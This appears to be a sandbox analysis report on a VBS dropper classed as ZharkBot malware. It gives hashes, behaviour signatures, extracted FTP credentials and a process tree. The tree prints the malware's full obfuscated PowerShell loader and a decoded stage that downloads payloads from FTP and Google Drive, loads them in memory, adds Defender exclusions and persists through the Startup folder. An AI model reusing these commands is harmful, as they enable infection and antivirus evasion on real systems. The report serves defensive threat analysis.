Overview

overview

10

Static

static

1

Sign021000110.vbs

windows7-x64

Sign021000110.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    297s
  • max time network
    278s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 03:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Sign021000110.vbs

  • Size

    166KB

  • MD5

    c9334c842ef061551279d98b8b48e1b2

  • SHA1

    a794c208ab09fe3d9631c377a7411dda9fcdc46c

  • SHA256

    505955df69d2bf11e756749c6ea8e8998a2fe26e1efa5542fbf6961233bdd317

  • SHA512

    c4e41b8117eb461e122497198daa231e722ef76805fc82cb6274edabf3a8f3f9e0395bfc6a80a3fb0ac9c671dfb9e6324f6953090f90d4e9ff4f2116980dbeb3

  • SSDEEP

    1536:5uAvuAvuAvuAvuAvuAvuAvuAvuAvuAKFZBfuAvuAvuAvuAvuAvuAvuAvuAvuAvuh:g555555555Y5555555555555555/

Score
10/10
zharkbotbotnetdefense_evasiondiscoveryexecutionpersistence

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    mfnEdMDLnE@@1578

Signatures

  • Detects ZharkBot payload 3 IoCs

    ZharkBot is a botnet written C++.

  • ZharkBot

    ZharkBot is a botnet written C++.

    botnetzharkbot
  • Zharkbot family
    zharkbot
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 20 IoCs
    persistence
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $cjckj = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'jAG8Abg' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAbg' + [char]66 + 'jAGEAbg' + [char]66 + 'jAHUAbgAuAGMAbw' + [char]66 + 'tAC8AYgAuAHQAeA' + [char]66 + '0ACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgAG0ARw' + [char]66 + 'xAGkAbgAkACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAAgACsAIA' + [char]66 + 'HAGkAVA' + [char]66 + '6AEoAJAAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgACgAZA' + [char]66 + 'hAG8ATAAuAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHQAbg' + [char]66 + 'lAHIAcg' + [char]66 + '1AEMAOgA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgAD0AIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAA7ACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAgAD0AIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAA7ACcALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAA7ACkAIAApACcAQQAnACwAJwCTIToAkyEnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAG4AeQ' + [char]66 + 'yAGwAeQAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bADsAIAApADgARg' + [char]66 + 'UAFUAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAAbg' + [char]66 + '5AHIAbA' + [char]66 + '5ACQAOwAgACAAfQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHgAag' + [char]66 + 'rAHgAZwAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACAAKQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACAAKAAgAD0AIA' + [char]66 + '4AGoAaw' + [char]66 + '4AGcAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAoACAAPQAgAFEARw' + [char]66 + 'wAGUASQAkAHsAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgADEALgAwAC4AMAAuADcAMgAxACAAZw' + [char]66 + 'uAGkAcAA7ACAAYwAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'kAG0AYwA7AGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHcAeg' + [char]66 + 'kAGoAeQAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACkAKQApACkAKQAgADYANQAgACwANQA1ACAALAAzADUAIAAsADkANAAgACwANAA2ACAALAA0ADYAIAAsADkANgAgACwAMAAxADEAIAAsADYANwAgACwAOAA2ACAALAA3ADcAIAAsADAAMAAxACAALAA5ADYAIAAsADAAMQAxACAALAAyADAAMQAgACwAOQAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAC0AIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAEYALQAgAHQAeA' + [char]66 + 'lAFQAbg' + [char]66 + 'pAGEAbA' + [char]66 + 'QAHMAQQAtACAAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALQ' + [char]66 + 'vAFQAdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAoACAALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAUw' + [char]66 + 'QACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAA7ACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAFEARw' + [char]66 + 'wAGUASQAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAATA' + [char]66 + 'MAEQALwAxADAALwAnACAAKwAgACcAcg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACgAIAA9ACAAdw' + [char]66 + '6AGQAag' + [char]66 + '5ACQAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAIA' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'sAGcAeQ' + [char]66 + 'uAEoAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAA9ACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'sAGcAeQ' + [char]66 + 'uAEoAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAAsAGwAZg' + [char]66 + 'zAGMAegAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '2AHcAdg' + [char]66 + '6AGcAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4Adg' + [char]66 + '3AHYAeg' + [char]66 + 'nACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAdg' + [char]66 + '3AHYAeg' + [char]66 + 'nACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'sAGYAcw' + [char]66 + 'jAHoAJAAoACAAPQAgAGwAZg' + [char]66 + 'zAGMAegAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAGwAZg' + [char]66 + 'zAGMAegAkACgAIAA9ACAAbA' + [char]66 + 'mAHMAYw' + [char]66 + '6ACQAewAgACkAIA' + [char]66 + 'FAEEAaw' + [char]66 + 'sAGsAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAEUAQQ' + [char]66 + 'rAGwAawAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'sAGYAcw' + [char]66 + 'jAHoAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAewAgACkAIA' + [char]66 + 'oAGkAVA' + [char]66 + '' + [char]66 + 'AEsAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'oAGkAVA' + [char]66 + '' + [char]66 + 'AEsAJAAgADsA';$cjckj = $cjckj.replace('уЦϚ' , 'B') ;;$npmll = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $cjckj ) ); $npmll = $npmll[-1..-$npmll.Length] -join '';$npmll = $npmll.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs');powershell $npmll
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $KATih = $host.Version.Major.Equals(2) ;if ( $KATih ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$zcsfl = 'https://drive.google.com/uc?export=download&id=';$klkAE = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $klkAE ) {$zcsfl = ($zcsfl + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$zcsfl = ($zcsfl + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$gzvwv = (New-Object Net.WebClient);$gzvwv.Encoding = [System.Text.Encoding]::UTF8;$gzvwv.DownloadFile($zcsfl, ($HzOMj + '\Upwin.msu') );$Jnygl = ('C:\Users\' + [Environment]::UserName );tkplB = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs' -Destination ( $Jnygl + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$yjdzw = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](109, 102, 110, 69, 100, 77, 68, 76, 110, 69, 64, 64, 49, 53, 55, 56 )))));Invoke-WebRequest -URI $yjdzw -OutFile $IepGQ -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$IepGQ = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$gxkjx = ( Get-Content -Path $IepGQ ) ;Invoke-WebRequest -URI $gxkjx -OutFile $IepGQ -UseBasicParsing } ;$ylryn = (Get-Content -Path $IepGQ -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ylryn.replace('↓:↓','A') );$sNwoM = 'C:\Users\Admin\AppData\Local\Temp\Sign021000110.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.b/moc.nucnacnegaminoc//:sptth' , $sNwoM , 'D DDRegAsm' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2220
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:4704
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABJAGUAcABHAFEAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAGcAeABrAGoAeAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABJAGUAcABHAFEAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJABnAHgAawBqAHgAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAEkAZQBwAEcAUQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAA= -inputFormat xml -outputFormat text
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4064
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:824
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1688
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            4⤵
              PID:3440
            • C:\Windows\SYSTEM32\cmd.exe
